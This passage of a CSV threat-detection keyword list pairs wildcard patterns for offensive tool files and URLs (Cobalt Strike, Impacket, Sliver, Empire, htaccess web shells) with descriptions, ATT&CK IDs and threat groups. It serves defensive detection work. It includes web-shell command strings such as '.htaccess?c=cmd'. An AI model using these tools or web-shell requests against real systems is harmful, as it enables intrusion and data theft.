T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*http_stager_server_prepend*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*http_stager_uri_x64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*http_stager_uri_x86*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*http1.x64.bin*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*http1.x64.dll*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*HTTPAES256Handler.*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*httpattack.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 
T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*httpattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*httpattack.py*","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z"
+"*httpattack.py*","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z"
+"*httpattacks/*.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*HTTP-Backdoor.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*http-c2_test.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*HttpEvilClippyController*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*HTTP-Login.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source.
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","HTTP-Login.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*httpntlm.go*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang.
Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z"
+"*httpntlm.old*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z"
+"*httppayload.bin*","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","10","10","352","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z"
+"*HttpProxyScan_Log4J2.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical
intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*http-redwarden*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z"
+"*httprelayclient.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 -
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z"
+"*httprelayclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g.
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*httprelayserver.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z"
+"*httprelayserver.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols.
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*http-request-smuggler-all.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z"
+"*https://*.*.devtunnels.ms*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","8","10","N/A","N/A","N/A","N/A"
+"*https://*.brs.devtunnels.ms/*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet.
Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","0","1","N/A","8","10","N/A","N/A","N/A","N/A"
+"*https://*.euw.devtunnels.ms*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","0","1","N/A","8","10","N/A","N/A","N/A","N/A"
+"*https://*.screenconnect.com/Bin/*.exe*","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","screenconnect.com","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
+"*https://*.sendspace.com/upload*","greyware_tool_keyword","sendspace.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Data Exfiltration","https://twitter.com/mthcht/status/1660953897622544384","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*https://*.use.devtunnels.ms*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet.
Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","0","1","N/A","8","10","N/A","N/A","N/A","N/A"
+"*https://*/.htaccess?c=cmd*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z"
+"*https://*/.htaccess?c=uname -a*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z"
+"*https://*/releases/download/*/lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z"
+"*https://*Microsoft.ActiveDirectory.Management.dll*","offensive_tool_keyword","powershell","redteam technique - import the ActiveDirectory module without the need to install it on the current computer - the dll has been extracted from a Windows 10 x64 with RSAT installed","T1110.001 - T1110.003 - T1110.004","TA0006","N/A","N/A","Credential Access","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/ActiveDirectory/Bruteforce.ps1","1","1","N/A","N/A","1","91","6","2023-10-01T14:24:00Z","2022-12-05T12:40:02Z"
+"*https://0.0.0.0:1337*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z"
+"*https://127.0.0.1:7443*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
+"*https://127.0.0.1:7443*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z"
+"*https://aka.ms/DevTunnelCliInstall*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","0","1","N/A","8","10","N/A","N/A","N/A","N/A"
+"*https://amsi.fail/*","offensive_tool_keyword","amsi.fail","AMSI.fail generates obfuscated PowerShell snippets that break or disable AMSI for the current process.
The snippets are randomly selected from a small pool of techniques/variations before being obfuscated. Every snippet is obfuscated at runtime/request so that no generated output share the same signatures.","T1059.001 - T1562.001 - T1027.005","TA0002 - TA0005 - TA0008","N/A","N/A","Defense Evasion","https://amsi.fail/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
